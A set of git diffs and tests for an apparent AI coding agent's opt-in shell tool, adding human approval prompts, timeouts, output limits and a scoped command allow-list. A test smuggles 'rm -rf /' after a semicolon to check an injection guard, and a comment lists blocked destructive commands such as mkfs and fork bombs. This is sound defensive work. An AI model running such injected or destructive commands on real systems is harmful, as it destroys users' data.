+      const human = vi.fn().mockResolvedValue({ type: 'approve', scope: 'session' });
+      runner.setToolApprovalCallback(human);
+
+      await runner.processMessages([new HumanMessage('checkout')]);
+
+      // Human prompted ONCE (first command); the variant auto-approved from the allow-list.
+      expect(human).toHaveBeenCalledTimes(1);
+      expect(human).toHaveBeenCalledWith({
+        name: 'run_shell_command',
+        args: { command: 'git checkout main' },
+      });
+    });
+
+    it('prompts the human for a non-matching command', async () => {
+      const runner = new GthAgentRunner(statusUpdateCallback);
+      mockAgent.stream.mockResolvedValue(streamOf('x'));
+      (mockAgent as any).getPendingToolInterrupts = vi
+        .fn()
+        .mockResolvedValueOnce([{ name: 'run_shell_command', args: { command: 'npm install' } }])
+        .mockResolvedValueOnce([]);
+      (mockAgent as any).streamResume = vi.fn().mockResolvedValue(streamOf(''));
+
+      await runner.init('code', { ...mockConfig, ...ALLOWLIST_CONFIG });
+      const human = vi.fn().mockResolvedValue({ type: 'approve', scope: 'once' });
+      runner.setToolApprovalCallback(human);
+
+      await runner.processMessages([new HumanMessage('install')]);
+      expect(human).toHaveBeenCalledTimes(1);
+    });
+
+    it('does NOT auto-approve a composed command sharing an approved prefix (injection guard)', async () => {
+      const runner = new GthAgentRunner(statusUpdateCallback);
+      mockAgent.stream.mockResolvedValue(streamOf('x'));
+      (mockAgent as any).getPendingToolInterrupts = vi
+        .fn()
+        .mockResolvedValueOnce([
+          { name: 'run_shell_command', args: { command: 'git checkout main' } },
+        ])
+        .mockResolvedValueOnce([
+          { name: 'run_shell_command', args: { command: 'git checkout x; rm -rf /' } },
+        ])
+        .mockResolvedValueOnce([]);
+      (mockAgent as any).streamResume = vi.fn().mockResolvedValue(streamOf(''));
+
+      await runner.init('code', { ...mockConfig, ...ALLOWLIST_CONFIG });
+      const human = vi.fn().mockResolvedValue({ type: 'approve', scope: 'session' });
+      runner.setToolApprovalCallback(human);
+
+      await runner.processMessages([new HumanMessage('go')]);
+      // First command prompts + records 'git checkout'. The injected second command must NOT
+      // auto-match, so the human is prompted AGAIN (twice total).
+      expect(human).toHaveBeenCalledTimes(2);
+    });
+
+    it('a fresh runner instance does not see another instance session approvals', async () => {
+      // Instance A approves at session scope.
+      const runnerA = new GthAgentRunner(statusUpdateCallback);
+      mockAgent.stream.mockResolvedValue(streamOf('a'));
+      (mockAgent as any).getPendingToolInterrupts = vi
+        .fn()
+        .mockResolvedValueOnce([
+          { name: 'run_shell_command', args: { command: 'git checkout main' } },
+        ])
+        .mockResolvedValueOnce([]);
+      (mockAgent as any).streamResume = vi.fn().mockResolvedValue(streamOf(''));
+      await runnerA.init('code', { ...mockConfig, ...ALLOWLIST_CONFIG });
+      runnerA.setToolApprovalCallback(
+        vi.fn().mockResolvedValue({ type: 'approve', scope: 'session' })
+      );
+      await runnerA.processMessages([new HumanMessage('a')]);
+
+      // Instance B (fresh session store) must still prompt for the same command.
+      const runnerB = new GthAgentRunner(statusUpdateCallback);
+      mockAgent.stream.mockResolvedValue(streamOf('b'));
+      (mockAgent as any).getPendingToolInterrupts = vi
+        .fn()
+        .mockResolvedValueOnce([
+          { name: 'run_shell_command', args: { command: 'git checkout main' } },
+        ])
+        .mockResolvedValueOnce([]);
+      (mockAgent as any).streamResume = vi.fn().mockResolvedValue(streamOf(''));
+      await runnerB.init('code', { ...mockConfig, ...ALLOWLIST_CONFIG });
+      const humanB = vi.fn().mockResolvedValue({ type: 'approve', scope: 'once' });
+      runnerB.setToolApprovalCallback(humanB);
+      await runnerB.processMessages([new HumanMessage('b')]);
+      expect(humanB).toHaveBeenCalledTimes(1);
+    });
+
+    it('once-scoped approval persists nothing (re-prompts next time)', async () => {
+      const runner = new GthAgentRunner(statusUpdateCallback);
+      mockAgent.stream.mockResolvedValue(streamOf('x'));
+      (mockAgent as any).getPendingToolInterrupts = vi
+        .fn()
+        .mockResolvedValueOnce([
+          { name: 'run_shell_command', args: { command: 'git checkout main' } },
+        ])
+        .mockResolvedValueOnce([
+          { name: 'run_shell_command', args: { command: 'git checkout dev' } },
+        ])
+        .mockResolvedValueOnce([]);
+      (mockAgent as any).streamResume = vi.fn().mockResolvedValue(streamOf(''));
+
+      await runner.init('code', { ...mockConfig, ...ALLOWLIST_CONFIG });
+      const human = vi.fn().mockResolvedValue({ type: 'approve', scope: 'once' });
+      runner.setToolApprovalCallback(human);
+
+      await runner.processMessages([new HumanMessage('go')]);
+      // 'once' remembers nothing → both commands prompt.
+      expect(human).toHaveBeenCalledTimes(2);
+    });
+
     it('does not attempt interrupt resolution when the agent lacks getState support', async () => {
       const runner = new GthAgentRunner(statusUpdateCallback);
       mockAgent.stream.mockResolvedValue(streamOf('hello'));

--- a/packages/core/src/config.ts
+++ b/packages/core/src/config.ts
@@ -530,9 +530,23 @@ export interface GthDevToolsConfig {
    * The confirmation — not string-filtering — is the guardrail, so the command
    * is passed through verbatim (pipes / `$` / `;` are all legitimate).
    *
-   * Example: `{ "shell": true }` or `{ "shell": { "enabled": true } }`.
+   * The object form also tunes the EXT-9 Tier-1 hardening applied to every run
+   * (these have safe defaults so bare `shell: true` is already hardened):
+   * - `timeout`: per-command wall-clock limit in MILLISECONDS before the child
+   *   (and its process group) is killed. Default {@link SHELL_DEFAULT_TIMEOUT_MS}.
+   * - `maxOutputBytes`: byte budget for the captured output returned to the model
+   *   (head + tail window; the middle is dropped and the full output spilled to a
+   *   temp file). Default {@link SHELL_DEFAULT_MAX_OUTPUT_BYTES}. Live terminal
+   *   streaming is never capped.
+   *
+   * A hardcoded hardline blocklist of catastrophic commands (rm -rf /, mkfs, dd
+   * to a block device, fork bomb, shutdown/reboot, …) is refused even under
+   * {@link shellYolo}; that floor is not configurable.
+   *
+   * Example: `{ "shell": true }`,
+   * `{ "shell": { "enabled": true, "timeout": 300000, "maxOutputBytes": 200000 } }`.
    */
-  shell?: boolean | { enabled?: boolean };
+  shell?: boolean | { enabled?: boolean; timeout?: number; maxOutputBytes?: number };
   /**
    * Opt-out of the per-command confirmation dialog for {@link shell}
    * (`run_shell_command`) — the explicit "yolo" bypass. When `true` AND `shell`
@@ -545,15 +559,57 @@ export interface GthDevToolsConfig {
 }
 
 /**
- * Normalize the {@link GthDevToolsConfig.shell} opt-in (bare boolean or `{ enabled }`)
- * to a plain boolean. Centralized so the toolkit (tool emission) and the deep agent
- * (interrupt wiring) agree on what "shell enabled" means.
+ * Default per-command shell timeout (ms) when {@link GthDevToolsConfig.shell}
+ * does not specify one. ~120s suits typical build/test/git steps without
+ * hanging the agent forever on a stuck command.
+ */
+export const SHELL_DEFAULT_TIMEOUT_MS = 120_000;
+
+/**
+ * Default byte budget for shell output captured into the ToolMessage returned to
+ * the model (head + tail window). ~100KB keeps a noisy log from blowing the
+ * context window; the full output is spilled to a temp file when this is exceeded.
+ */
+export const SHELL_DEFAULT_MAX_OUTPUT_BYTES = 100_000;
+
+/**
+ * Normalize the {@link GthDevToolsConfig.shell} opt-in (bare boolean or
+ * `{ enabled }`) to a plain boolean. Centralized so the toolkit (tool emission)
+ * and the deep agent (interrupt wiring) agree on what "shell enabled" means.
  */
 export function isShellToolEnabled(devTools: GthDevToolsConfig | undefined): boolean {
   const shell = devTools?.shell;
   if (typeof shell === 'boolean') return shell;
   if (shell && typeof shell === 'object') return shell.enabled === true;
   return false;
+}
+
+/**
+ * Resolve the per-command shell timeout (ms) from config, falling back to
+ * {@link SHELL_DEFAULT_TIMEOUT_MS}. Only the object form can override it; a bare
+ * `shell: true` uses the default. Non-positive / non-finite values are ignored.
+ */
+export function getShellTimeoutMs(devTools: GthDevToolsConfig | undefined): number {
+  const shell = devTools?.shell;
+  if (shell && typeof shell === 'object' && typeof shell.timeout === 'number') {
+    if (Number.isFinite(shell.timeout) && shell.timeout > 0) return shell.timeout;
+  }
+  return SHELL_DEFAULT_TIMEOUT_MS;
+}
+
+/**
+ * Resolve the captured-output byte budget from config, falling back to
+ * {@link SHELL_DEFAULT_MAX_OUTPUT_BYTES}. Only the object form can override it.
+ * Non-positive / non-finite values are ignored.
+ */
+export function getShellMaxOutputBytes(devTools: GthDevToolsConfig | undefined): number {
+  const shell = devTools?.shell;
+  if (shell && typeof shell === 'object' && typeof shell.maxOutputBytes === 'number') {
+    if (Number.isFinite(shell.maxOutputBytes) && shell.maxOutputBytes > 0) {
+      return shell.maxOutputBytes;
+    }
+  }
+  return SHELL_DEFAULT_MAX_OUTPUT_BYTES;
 }
 
 export interface LLMConfig extends Record<string, unknown> {

--- a/packages/core/src/config.ts
+++ b/packages/core/src/config.ts
@@ -489,7 +489,7 @@ export interface CustomCommandConfig {
 /**
  * Config for {@link GthDevToolkit}.
  * Tools are not applied when config is not provided.
- * Only available in `code` mode.
+ * Only available in `code`/`exec` mode (and `ask --write`).
  */
 export interface GthDevToolsConfig {
   /**
@@ -515,6 +515,45 @@ export interface GthDevToolsConfig {
    * Not applied when config is not provided.
    */
   run_single_test?: string;
+  /**
+   * Opt-in general-purpose shell tool (`run_shell_command`). Unlike the fixed
+   * `run_*` commands above, this lets the agent run ARBITRARY shell commands it
+   * composes itself — the agentic-coding escape hatch the deep agent otherwise
+   * lacks (it can read/write files but not run commands).
+   *
+   * OFF by default; only emitted when truthy. Accepts a bare boolean or an
+   * `{ enabled }` object for symmetry with future per-tool options.
+   *
+   * Because the model chooses the command, every invocation is gated behind a
+   * per-command human confirmation dialog (LangChain `humanInTheLoopMiddleware`,
+   * wired via deepagents' `interruptOn`) UNLESS {@link shellYolo} bypasses it.
+   * The confirmation — not string-filtering — is the guardrail, so the command
+   * is passed through verbatim (pipes / `$` / `;` are all legitimate).
+   *
+   * Example: `{ "shell": true }` or `{ "shell": { "enabled": true } }`.
+   */
+  shell?: boolean | { enabled?: boolean };
+  /**
+   * Opt-out of the per-command confirmation dialog for {@link shell}
+   * (`run_shell_command`) — the explicit "yolo" bypass. When `true` AND `shell`
+   * is enabled, the shell tool runs without any approval interrupt: the model's
+   * commands execute immediately. Dangerous by design; off by default.
+   *
+   * Example: `{ "shell": true, "shellYolo": true }`.
+   */
+  shellYolo?: boolean;
+}
+
+/**
+ * Normalize the {@link GthDevToolsConfig.shell} opt-in (bare boolean or `{ enabled }`)
+ * to a plain boolean. Centralized so the toolkit (tool emission) and the deep agent
+ * (interrupt wiring) agree on what "shell enabled" means.
+ */
+export function isShellToolEnabled(devTools: GthDevToolsConfig | undefined): boolean {
+  const shell = devTools?.shell;
+  if (typeof shell === 'boolean') return shell;
+  if (shell && typeof shell === 'object') return shell.enabled === true;
+  return false;
 }
 
 export interface LLMConfig extends Record<string, unknown> {

--- a/packages/core/src/config.ts
+++ b/packages/core/src/config.ts
@@ -16,6 +16,7 @@ import {
   USER_PROJECT_CONFIG_MJS,
 } from '#src/constants.js';
 import { StatusLevel } from '#src/core/types.js';
+import type { GthCommand } from '#src/core/types.js';
 import {
   displayDebug,
   displayError,
@@ -545,8 +546,25 @@ export interface GthDevToolsConfig {
    *
    * Example: `{ "shell": true }`,
    * `{ "shell": { "enabled": true, "timeout": 300000, "maxOutputBytes": 200000 } }`.
+   *
+   * The object form additionally accepts EXT-9 Tier-2 allow-list knobs:
+   * - `allowlist`: master switch for the scoped approval allow-list (session +
+   *   persisted `always`). Default `true` — once a command is approved at `session`/
+   *   `always` scope, flag-variants of the same classified operation auto-approve
+   *   without re-prompting. Set `false` to require fresh approval for every command.
+   * - `persistAllowlist`: whether `always`-scoped approvals are written to the project
+   *   allow-list file (`.gsloth/.gsloth-settings/shell-allowlist.json`). Default `true`.
+   *   When `false`, an `always` decision behaves like `session` (in-memory only).
    */
-  shell?: boolean | { enabled?: boolean; timeout?: number; maxOutputBytes?: number };
+  shell?:
+    | boolean
+    | {
+        enabled?: boolean;
+        timeout?: number;
+        maxOutputBytes?: number;
+        allowlist?: boolean;
+        persistAllowlist?: boolean;
+      };
   /**
    * Opt-out of the per-command confirmation dialog for {@link shell}
    * (`run_shell_command`) — the explicit "yolo" bypass. When `true` AND `shell`
@@ -610,6 +628,48 @@ export function getShellMaxOutputBytes(devTools: GthDevToolsConfig | undefined):
     }
   }
   return SHELL_DEFAULT_MAX_OUTPUT_BYTES;
+}
+
+/**
+ * Whether the EXT-9 Tier-2 scoped allow-list is active. Default `true`; only the object
+ * form's `allowlist: false` disables it (a bare `shell: true` keeps it on). When off, the
+ * runner prompts for every `run_shell_command` regardless of prior approvals.
+ */
+export function isShellAllowlistEnabled(devTools: GthDevToolsConfig | undefined): boolean {
+  const shell = devTools?.shell;
+  if (shell && typeof shell === 'object' && shell.allowlist === false) return false;
+  return true;
+}
+
+/**
+ * Whether `always`-scoped approvals are persisted to the project allow-list file. Default
+ * `true`; only the object form's `persistAllowlist: false` disables persistence (an
+ * `always` decision then behaves as `session`).
+ */
+export function isShellAllowlistPersisted(devTools: GthDevToolsConfig | undefined): boolean {
+  const shell = devTools?.shell;
+  if (shell && typeof shell === 'object' && shell.persistAllowlist === false) return false;
+  return true;
+}
+
+/**
+ * Resolve the {@link GthDevToolsConfig} that applies to the active command, mirroring the
+ * per-command selection in `builtInToolsConfig.getDefaultTools` (which is what actually emits
+ * the dev tools) and `GthDeepAgent.getEffectiveDevToolsConfig`: `exec` → `commands.exec`,
+ * `ask --write` → `commands.ask`, `code` → `commands.code`; `undefined` elsewhere (the
+ * toolkit is inert there). Shared in core so the runner's allow-list gate stays in lockstep
+ * with where the shell tool is actually emitted.
+ */
+export function getEffectiveDevToolsConfig(
+  config: Pick<GthConfig, 'commands' | 'askWriteMode'> | undefined,
+  command: GthCommand | undefined
+): GthDevToolsConfig | undefined {
+  if (!config) return undefined;
+  const askWrite = command === 'ask' && config.askWriteMode === true;
+  if (command === 'exec') return config.commands?.exec?.devTools;
+  if (askWrite) return config.commands?.ask?.devTools;
+  if (command === 'code') return config.commands?.code?.devTools;
+  return undefined;
 }
 
 export interface LLMConfig extends Record<string, unknown> {

--- a/packages/core/src/constants.ts
+++ b/packages/core/src/constants.ts
@@ -12,3 +12,8 @@ export const GSLOTH_CHAT_PROMPT = '.gsloth.chat.md';
 export const GSLOTH_CODE_PROMPT = '.gsloth.code.md';
 export const GSLOTH_EXEC_PROMPT = '.gsloth.exec.md';
 export const AIIGNORE_FILE = '.aiignore';
+/**
+ * EXT-9 Tier-2: project-scoped persisted shell allow-list (`always` approvals).
+ * Lives under `.gsloth/.gsloth-settings/` like other project settings.
+ */
+export const SHELL_ALLOWLIST_FILE = 'shell-allowlist.json';

--- a/packages/core/src/core/GthAbstractAgent.ts
+++ b/packages/core/src/core/GthAbstractAgent.ts
@@ -6,6 +6,7 @@ import {
   GthCommand,
   GthCompiledGraph,
   Message,
+  PendingToolInterrupt,
   StatusLevel,
   StatusUpdateCallback,
 } from '#src/core/types.js';
@@ -129,12 +130,40 @@ export abstract class GthAbstractAgent implements GthAgentInterface {
     messages: Message[],
     runConfig: RunnableConfig
   ): Promise<IterableReadableStream<string>> {
+    debugLog('=== Starting streaming invoke ===');
+    debugLogObject('LLM Input Messages', messages);
+    return this.streamFromInput({ messages }, runConfig);
+  }
+
+  /**
+   * Resume a graph suspended on a human-in-the-loop `interrupt()` and stream the continuation
+   * as text. Identical plumbing to {@link stream} (Esc-to-interrupt, binary handling), except
+   * the graph input is a `Command({ resume })` instead of fresh `messages` — so the suspended
+   * tool-approval interrupt is answered and the run continues on the same thread.
+   */
+  async streamResume(
+    resumeValue: unknown,
+    runConfig: RunnableConfig
+  ): Promise<IterableReadableStream<string>> {
+    debugLog('=== Starting streaming resume ===');
+    debugLogObject('Resume value', resumeValue);
+    return this.streamFromInput(new Command({ resume: resumeValue }), runConfig);
+  }
+
+  /**
+   * Shared body for {@link stream} / {@link streamResume}: drive the compiled graph from
+   * `input` (fresh `{ messages }` or a resume `Command`) and surface AI text deltas as a
+   * string stream, with Esc-to-interrupt and binary-output materialization.
+   */
+  private async streamFromInput(
+    // eslint-disable-next-line @typescript-eslint/no-explicit-any
+    input: any,
+    runConfig: RunnableConfig
+  ): Promise<IterableReadableStream<string>> {
     if (!this.agent || !this.config) {
       throw new Error('Agent not initialized. Call init() first.');
     }
 
-    debugLog('=== Starting streaming invoke ===');
-    debugLogObject('LLM Input Messages', messages);
     debugLogObject('Stream RunConfig', runConfig);
 
     this.statusUpdate(StatusLevel.INFO, '\nThinking...\n');
@@ -160,10 +189,11 @@ export abstract class GthAbstractAgent implements GthAgentInterface {
 
     let stream;
     try {
-      stream = await this.agent.stream(
-        { messages },
-        { ...runConfig, streamMode: 'messages', signal: abortController.signal }
-      );
+      stream = await this.agent.stream(input, {
+        ...runConfig,
+        streamMode: 'messages',
+        signal: abortController.signal,
+      });
     } catch (error) {
       // If stream creation fails (e.g. an auth error), the IterableReadableStream below -
       // whose finally/cancel are what normally unregister the Escape listener - is never
@@ -345,6 +375,52 @@ export abstract class GthAbstractAgent implements GthAgentInterface {
       }
       throw e;
     }
+  }
+
+  /**
+   * Inspect the checkpointed state for the thread and return the tool calls currently pending
+   * human approval (empty array when the run finished normally). A LangGraph
+   * `humanInTheLoopMiddleware` interrupt parks one `HITLRequest` per suspended super-step in
+   * `state.tasks[].interrupts[].value.actionRequests` (each `{ name, args }`); this flattens
+   * those into {@link PendingToolInterrupt}s. Defensive throughout — a graph without
+   * `getState`, or any unexpected shape, yields `[]` rather than throwing, so a missing HITL
+   * setup degrades to "no approval needed" instead of breaking the run.
+   */
+  async getPendingToolInterrupts(runConfig: RunnableConfig): Promise<PendingToolInterrupt[]> {
+    if (!this.agent || typeof this.agent.getState !== 'function') {
+      return [];
+    }
+    let state: unknown;
+    try {
+      state = await this.agent.getState(runConfig);
+    } catch (e) {
+      debugLogError('getPendingToolInterrupts getState', e);
+      return [];
+    }
+    const tasks = (state as { tasks?: unknown })?.tasks;
+    if (!Array.isArray(tasks)) {
+      return [];
+    }
+    const pending: PendingToolInterrupt[] = [];
+    for (const task of tasks) {
+      const interrupts = (task as { interrupts?: unknown })?.interrupts;
+      if (!Array.isArray(interrupts)) continue;
+      for (const interrupt of interrupts) {
+        const value = (interrupt as { value?: unknown })?.value;
+        const actionRequests = (value as { actionRequests?: unknown })?.actionRequests;
+        if (!Array.isArray(actionRequests)) continue;
+        for (const action of actionRequests) {
+          const name = (action as { name?: unknown })?.name;
+          if (typeof name !== 'string') continue;
+          const args = (action as { args?: unknown })?.args;
+          pending.push({
+            name,
+            args: args && typeof args === 'object' ? (args as Record<string, unknown>) : {},
+          });
+        }
+      }
+    }
+    return pending;
   }
 
   protected async *processEventStream(

--- a/packages/core/src/core/GthAgentRunner.ts
+++ b/packages/core/src/core/GthAgentRunner.ts
@@ -8,6 +8,8 @@ import {
   GthCommand,
   Message,
   StatusUpdateCallback,
+  ToolApprovalCallback,
+  ToolApprovalDecision,
 } from '#src/core/types.js';
 import { GthLangChainAgent } from '#src/core/GthLangChainAgent.js';
 import { enhanceVertexUnauthorizedMessage } from '#src/utils/vertexaiUtils.js';
@@ -31,6 +33,13 @@ export class GthAgentRunner {
   private config: GthConfig | null = null;
   private runConfig: RunnableConfig | null = null;
   private agentFactory: GthAgentFactory;
+  /**
+   * Consumer hook invoked when a run suspends on a tool-approval interrupt (e.g. the opt-in
+   * `run_shell_command` confirmation). Set via {@link setToolApprovalCallback}; when unset the
+   * runner REJECTS pending tool calls rather than hanging or auto-approving — the safe default
+   * for non-interactive entrypoints (a scripted `exec` run with no TTY to prompt on).
+   */
+  private toolApprovalCallback: ToolApprovalCallback | null = null;
 
   /**
    * @param agentFactory Produces the {@link GthAgentInterface} the runner drives.
@@ -47,6 +56,15 @@ export class GthAgentRunner {
     this.resolvers = resolvers;
     this.agentFactory =
       agentFactory ?? ((status, agentResolvers) => new GthLangChainAgent(status, agentResolvers));
+  }
+
+  /**
+   * Register the tool-approval handler the runner calls when a run suspends on a tool-approval
+   * interrupt (the interactive readline session wires a y/n prompt here). Pass `null` to clear.
+   * Without a handler the runner rejects pending tool calls (see {@link toolApprovalCallback}).
+   */
+  public setToolApprovalCallback(callback: ToolApprovalCallback | null): void {
+    this.toolApprovalCallback = callback;
   }
 
   /**
@@ -97,10 +115,11 @@ export class GthAgentRunner {
         const stream = await this.agent.stream(messages, this.runConfig);
         let result = '';
         try {
-          for await (const chunk of stream) {
-            debugLogObject('Stream chunk', chunk);
-            result += chunk;
-          }
+          result = await this.drainTextStream(stream);
+          // A run may suspend on one or more tool-approval interrupts (run_shell_command).
+          // Resolve them in a loop: each resume can itself suspend again on the next gated
+          // tool call, so keep going until the graph completes with no pending interrupts.
+          result += await this.resolveToolInterrupts();
         } catch (streamError) {
           // Handle streaming-specific errors
           debugLogError('Stream processing', streamError);
@@ -143,6 +162,62 @@ export class GthAgentRunner {
         error instanceof Error ? { cause: error } : undefined
       );
     }
+  }
+
+  /**
+   * Accumulate a text stream into a single string. Extracted so {@link processMessages} and
+   * the interrupt-resume loop ({@link resolveToolInterrupts}) drain streams identically.
+   */
+  private async drainTextStream(stream: AsyncIterable<string>): Promise<string> {
+    let result = '';
+    for await (const chunk of stream) {
+      debugLogObject('Stream chunk', chunk);
+      result += chunk;
+    }
+    return result;
+  }
+
+  /**
+   * After a streamed run ends, resolve any tool-approval interrupts it suspended on. For each
+   * pending tool call the {@link toolApprovalCallback} is consulted (defaulting to REJECT when
+   * no handler is wired, so a non-interactive run never hangs or auto-approves); the collected
+   * decisions are then sent back via the agent's `streamResume` as a LangChain HITL resume
+   * (`{ decisions }`). Because a resumed run can suspend again on the next gated tool call, this
+   * loops until the graph completes with no pending interrupts. Returns the concatenated text
+   * streamed across all resume turns (empty when nothing was resumed).
+   *
+   * No-ops (returns '') when the agent does not support interrupts (`getPendingToolInterrupts`/
+   * `streamResume` absent), so the lean agent and non-HITL configs are unaffected.
+   */
+  private async resolveToolInterrupts(): Promise<string> {
+    const agent = this.agent;
+    const runConfig = this.runConfig;
+    if (!agent || !runConfig) return '';
+    if (!agent.getPendingToolInterrupts || !agent.streamResume) return '';
+
+    let resumedText = '';
+    // Bound the loop defensively so a misbehaving graph that re-suspends forever cannot spin.
+    for (let guard = 0; guard < 100; guard++) {
+      const pending = await agent.getPendingToolInterrupts(runConfig);
+      if (pending.length === 0) break;
+
+      const decisions: ToolApprovalDecision[] = [];
+      for (const tool of pending) {
+        if (this.toolApprovalCallback) {
+          decisions.push(await this.toolApprovalCallback(tool));
+        } else {
+          // No interactive handler (e.g. non-TTY exec run): reject rather than auto-approve.
+          decisions.push({
+            type: 'reject',
+            message: 'Tool call rejected: no interactive approval handler available.',
+          });
+        }
+      }
+
+      const stream = await agent.streamResume({ decisions }, runConfig);
+      resumedText += await this.drainTextStream(stream);
+    }
+    return resumedText;
   }
 
   /**

--- a/packages/core/src/core/GthAgentRunner.ts
+++ b/packages/core/src/core/GthAgentRunner.ts
@@ -1,4 +1,9 @@
-import { GthConfig } from '#src/config.js';
+import {
+  GthConfig,
+  getEffectiveDevToolsConfig,
+  isShellAllowlistEnabled,
+  isShellAllowlistPersisted,
+} from '#src/config.js';
 import { BaseCheckpointSaver } from '@langchain/langgraph';
 import {
   AgentResolvers,
@@ -7,11 +12,22 @@ import {
   GthAgentInterface,
   GthCommand,
   Message,
+  PendingToolInterrupt,
   StatusUpdateCallback,
   ToolApprovalCallback,
   ToolApprovalDecision,
 } from '#src/core/types.js';
 import { GthLangChainAgent } from '#src/core/GthLangChainAgent.js';
+import {
+  AllowlistStore,
+  PersistedAllowlist,
+  matchesApproval,
+  type ApprovalScope,
+} from '#src/core/shell/allowlist.js';
+import { classifyCommand } from '#src/core/shell/arity.js';
+import { normalizeCommand } from '#src/core/shell/normalize.js';
+import { getGslothConfigWritePath } from '#src/utils/fileUtils.js';
+import { SHELL_ALLOWLIST_FILE } from '#src/constants.js';
 import { enhanceVertexUnauthorizedMessage } from '#src/utils/vertexaiUtils.js';
 import { RunnableConfig } from '@langchain/core/runnables';
 import { getNewRunnableConfig } from '#src/utils/llmUtils.js';
@@ -40,6 +56,24 @@ export class GthAgentRunner {
    * for non-interactive entrypoints (a scripted `exec` run with no TTY to prompt on).
    */
   private toolApprovalCallback: ToolApprovalCallback | null = null;
+
+  /** The command the runner was initialized for; selects which `devTools` config applies. */
+  private command: GthCommand | undefined = undefined;
+
+  /**
+   * EXT-9 Tier-2 session allow-list — approved command prefixes that auto-approve for the
+   * life of THIS runner instance. Instance-scoped (not module-global) so concurrent
+   * sessions (ACP / AG-UI multi-session) cannot stomp each other's approvals.
+   */
+  private readonly sessionAllowlist = new AllowlistStore();
+
+  /**
+   * EXT-9 Tier-2 persisted (`always`) allow-list, loaded lazily on first use from
+   * `.gsloth/.gsloth-settings/shell-allowlist.json`. Null until the shell tool is gated
+   * and the allow-list is enabled; null also when persistence is disabled by config.
+   */
+  private persistedAllowlist: PersistedAllowlist | null = null;
+  private persistedAllowlistLoaded = false;
 
   /**
    * @param agentFactory Produces the {@link GthAgentInterface} the runner drives.
@@ -78,6 +112,7 @@ export class GthAgentRunner {
     checkpointSaver?: BaseCheckpointSaver | undefined
   ): Promise<void> {
     this.config = configIn;
+    this.command = command;
 
     // Initialize debug logging
     initDebugLogging(configIn.debugLog ?? false);
@@ -203,21 +238,109 @@ export class GthAgentRunner {
 
       const decisions: ToolApprovalDecision[] = [];
       for (const tool of pending) {
-        if (this.toolApprovalCallback) {
-          decisions.push(await this.toolApprovalCallback(tool));
-        } else {
-          // No interactive handler (e.g. non-TTY exec run): reject rather than auto-approve.
-          decisions.push({
-            type: 'reject',
-            message: 'Tool call rejected: no interactive approval handler available.',
-          });
-        }
+        decisions.push(await this.decideToolApproval(tool));
       }
 
       const stream = await agent.streamResume({ decisions }, runConfig);
       resumedText += await this.drainTextStream(stream);
     }
     return resumedText;
+  }
+
+  /**
+   * Decide a single pending tool call (EXT-9 Tier-2). For the opt-in `run_shell_command`,
+   * consult the scoped allow-list FIRST: if the command's classified prefix is already
+   * approved (session or persisted `always`) and survives the safe-bin anti-widening
+   * re-validation, auto-approve SILENTLY (no human prompt). Otherwise fall through to the
+   * human callback; when the human grants `session`/`always` scope, record the command's
+   * classified prefix into the matching store so future flag-variants stop re-prompting.
+   *
+   * When no human callback is wired (non-TTY exec run) and nothing is allow-listed, reject —
+   * never auto-approve. Non-shell tools (or any tool when the allow-list is disabled) skip the
+   * allow-list and go straight to the human callback / default-reject, preserving prior behaviour.
+   *
+   * Hardline catastrophic commands remain refused at exec time regardless of any approval here
+   * (defense in depth in `GthDevToolkit.executeCommand`), so an allow-listed `rm -rf /` still
+   * cannot run.
+   */
+  private async decideToolApproval(tool: PendingToolInterrupt): Promise<ToolApprovalDecision> {
+    const command = typeof tool.args?.command === 'string' ? (tool.args.command as string) : null;
+    const allowlistApplies =
+      tool.name === 'run_shell_command' && command !== null && this.isShellAllowlistOn();
+
+    // Auto-approve from the allow-list without prompting.
+    if (allowlistApplies && this.isApprovedByAllowlist(command)) {
+      return { type: 'approve', scope: 'session' };
+    }
+
+    if (!this.toolApprovalCallback) {
+      // No interactive handler (e.g. non-TTY exec run): reject rather than auto-approve.
+      return {
+        type: 'reject',
+        message: 'Tool call rejected: no interactive approval handler available.',
+      };
+    }
+
+    const decision = await this.toolApprovalCallback(tool);
+
+    // Persist the human's scoped grant so future variants of the same operation skip the prompt.
+    if (decision.type === 'approve' && allowlistApplies && command) {
+      this.recordApproval(command, decision.scope ?? 'once');
+    }
+    return decision;
+  }
+
+  /** Whether the EXT-9 Tier-2 allow-list is enabled for the active command's devTools config. */
+  private isShellAllowlistOn(): boolean {
+    const devTools = getEffectiveDevToolsConfig(this.config ?? undefined, this.command);
+    return isShellAllowlistEnabled(devTools);
+  }
+
+  /**
+   * Lazily load (once per instance) the persisted `always` allow-list, unless persistence is
+   * disabled by config. Returns null when persistence is off so `always` grants behave as
+   * `session` (in-memory only).
+   */
+  private getPersistedAllowlist(): PersistedAllowlist | null {
+    if (this.persistedAllowlistLoaded) return this.persistedAllowlist;
+    this.persistedAllowlistLoaded = true;
+    const devTools = getEffectiveDevToolsConfig(this.config ?? undefined, this.command);
+    if (!isShellAllowlistPersisted(devTools)) {
+      this.persistedAllowlist = null;
+      return null;
+    }
+    try {
+      const filePath = getGslothConfigWritePath(SHELL_ALLOWLIST_FILE);
+      this.persistedAllowlist = new PersistedAllowlist(filePath);
+    } catch (e) {
+      // Path/IO failure → behave as no persisted store (still safe: just prompts more).
+      debugLogError('Loading persisted shell allow-list', e);
+      this.persistedAllowlist = null;
+    }
+    return this.persistedAllowlist;
+  }
+
+  /** Check the command against the session + persisted stores (with anti-widening re-validation). */
+  private isApprovedByAllowlist(command: string): boolean {
+    return matchesApproval(command, {
+      session: this.sessionAllowlist,
+      always: this.getPersistedAllowlist() ?? undefined,
+    });
+  }
+
+  /**
+   * Record a human-granted approval at the given scope. `once` persists nothing. `session`
+   * adds the classified prefix to the in-memory store. `always` additionally persists it (or
+   * falls back to session-only when persistence is disabled).
+   */
+  private recordApproval(command: string, scope: ApprovalScope): void {
+    if (scope === 'once') return;
+    const classification = classifyCommand(command, normalizeCommand);
+    if (!classification) return; // unclassifiable (composition/redirection) → never remember.
+    this.sessionAllowlist.add(classification.prefix);
+    if (scope === 'always') {
+      this.getPersistedAllowlist()?.add(classification.prefix);
+    }
   }
 
   /**

--- a/packages/core/src/core/shell/allowlist.ts
+++ b/packages/core/src/core/shell/allowlist.ts
@@ -1,0 +1,219 @@
+/**
+ * @module core/shell/allowlist
+ *
+ * EXT-9 Tier-2: the persisted + session-scoped allow-list engine for the opt-in
+ * `run_shell_command` tool. Once a human approves a command at `session` or `always`
+ * scope, future commands with the same classified prefix ({@link classifyCommand}) are
+ * auto-approved without re-prompting — the ergonomics improvement mature agents
+ * (opencode/openclaw/hermes) ship.
+ *
+ * SECURITY — a naive "remember the prefix" allow-list is an injection vector. Two layers
